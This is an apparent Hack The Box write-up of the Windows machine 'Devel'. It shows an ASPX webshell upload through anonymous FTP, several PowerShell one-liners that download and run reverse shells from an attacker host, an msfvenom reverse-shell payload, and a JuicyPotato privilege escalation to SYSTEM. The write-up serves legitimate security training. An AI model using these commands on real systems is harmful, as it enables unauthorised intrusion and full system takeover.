# Devel - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

Devel was a quick easy-rated HTB Windows machine created by [ch4p](https://app.hackthebox.com/users/1)

For foothold, we write an aspx shell to the IIS webroot via anonymous FTP login.  
We exploit `SeImpersonatePrivilege` with `JuicyPotato` for root.

## Initial recon

```console
opcode@parrot$ nmap -v -p- 10.10.10.5
Nmap scan report for 10.10.10.5
Host is up (0.096s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http
```

```console
opcode@parrot$ nmap -sC -sV -p 21,80 -oN devel.nmap 10.10.10.5
Nmap scan report for 10.10.10.5
Host is up (0.095s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-title: IIS7
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

Only the FTP (21) and HTTP (80) ports are exposed.  
Port 80 is the default IIS page.

## FTP anonymous login

Anonymous login is allowed on FTP.  
We can use `anonymous:anonymous` to authenticate:

```console
opcode@parrot$ ftp 10.10.10.5                                    
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:opcode): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
03-17-17  05:37PM                  689 iisstart.htm
03-17-17  05:37PM               184946 welcome.png
```

This seems to be the webroot for the HTTP port.

Therefore, we can try uploading an aspx shell.  
I used the one that came with my parrot install, present in `/usr/share/webshells/aspx/cmdasp.aspx`

```console
opcode@parrot$ cp /usr/share/webshells/aspx/cmdasp.aspx opcode.aspx
```

And then I uploaded it in the FTP session:

```console
ftp> put opcode.aspx
local: opcode.aspx remote: opcode.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
```

Now, we can visit <http://10.10.10.5/opcode.aspx> and execute OS commands:

![1](images/1.png)

Next, I tried to get a reverse shell:

```powershell
powershell.exe IEX(IWR http://10.10.14.128:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.128 9001
```

It turns out, `IWR` is not recognized by this old version of `powershell.exe`.  
We need to tweak it a bit:

```powershell
powershell.exe IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.128:8000/Invoke-ConPtyShell.ps1'); Invoke-ConPtyShell 10.10.14.128 9001
```

The command worked, but `ConPtyShell` didn't work on this old Windows 7 Enterprise.  
Bummer, but I can use my modified version of this reverse shell: <https://gist.github.com/guglia001/1de961b6b7fef4ef4f383015bb0f7c1e>

```powershell
powershell.exe IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.128:8000/myPasta.ps1')
```

This one did not work either because modern PowerShell features are used. I decided to give [Nishang's PowerShell TCP Reverse Shell](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1) a try.

```powershell
powershell.exe IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.128:8000/nishang/Invoke-PowerShellTcpOneLine.ps1')
```

And it worked; I got a shell.

## Exploiting `SeImpersonatePrivilege` with `JuicyPotato`

```console
PS C:\> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeAuditPrivilege              Generate security audits                  Enabled 
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled
```

We have the `SeImpersonatePrivilege`; therefore, a potato exploit can be used.

```console
PS C:\> systeminfo

Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          babis
Registered Organization:   
Product ID:                55041-051-0948536-86302
Original Install Date:     17/3/2017, 4:17:31 ??
System Boot Time:          22/7/2023, 11:14:25 ??
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
[--SNIP--]
```

I suspect it is one of the rare boxes where [HotPotato](https://github.com/foxglovesec/Potato), [RottenPotato](https://github.com/breenmachine/RottenPotatoNG), [JuicyPotato](https://github.com/ohpe/juicy-potato) as well as [RoguePotato](https://github.com/antonioCoco/RoguePotato) can be used.

I've always wanted to try JuicyPotato. But there's an issue: we don't have `stderr` in this reverse shell.  
So, I decided to generate a `msfvenom` executable as they have support for `stderr`

```console
opcode@parrot$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.128 LPORT=9001 -f exe -o update.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: update.exe
```


```console
PS C:\windows\tasks> (New-Object System.Net.WebClient).DownloadFile('http://10.10.14.128:8000/update.exe', 'C:\Windows\Tasks\update.exe')
PS C:\windows\tasks> (New-Object System.Net.WebClient).DownloadFile('http://10.10.14.128:8000/potatoes/JuicyPotato.exe', 'C:\Windows\Tasks\JuicyPotato.exe')
```

Now, we can get a better shell:

```console
PS C:\windows\tasks> .\update.exe
```

```console
C:\windows\tasks> .\JuicyPotato.exe -l 1337 -t * -c {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83} -p "c:\windows\system32\cmd.exe" -a "/c powershell.exe IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.128:8000/nishang/Invoke-PowerShellTcpOneLine.ps1')"
This version of C:\windows\tasks\JuicyPotato.exe is not compatible with the version of Windows you're running. Check your computer's system information to see whether you need a x86 (32-bit) or x64 (64-bit) version of the program, and then contact the software publisher.
```

I didn't expect that. To overcome this issue, I obtained the x86 version from <https://github.com/ivanitlearning/Juicy-Potato-x86>

```console
PS C:\windows\tasks> del JuicyPotato.exe
PS C:\windows\tasks> powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://10.10.14.128:8000/potatoes/JuicyPotatox86.exe', 'C:\Windows\Tasks\JuicyPotato.exe')
```

After transferring, I tried again:

```console
C:\windows\tasks> .\JuicyPotato.exe -l 1337 -t * -c {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83} -p "c:\windows\system32\cmd.exe" -a "/c powershell.exe IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.128:8000/nishang/Invoke-PowerShellTcpOneLine.ps1')"
Testing {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83} 1337
COM -> recv failed with error: 10038
```

We can try other different CLSIDs from <https://ohpe.it/juicy-potato/CLSID/Windows_7_Enterprise/>

```console
C:\windows\tasks> .\JuicyPotato.exe -l 1337 -t * -c {03ca98d6-ff5d-49b8-abc6-03dd84127020} -p "c:\windows\system32\cmd.exe" -a "/c powershell.exe IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.128:8000/nishang/Invoke-PowerShellTcpOneLine.ps1')"
Testing {03ca98d6-ff5d-49b8-abc6-03dd84127020} 1337
......
[+] authresult 0
{03ca98d6-ff5d-49b8-abc6-03dd84127020};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK
```

And we'd get a shell as system:

```console
PS C:\Windows\system32> whoami
nt authority\system
```
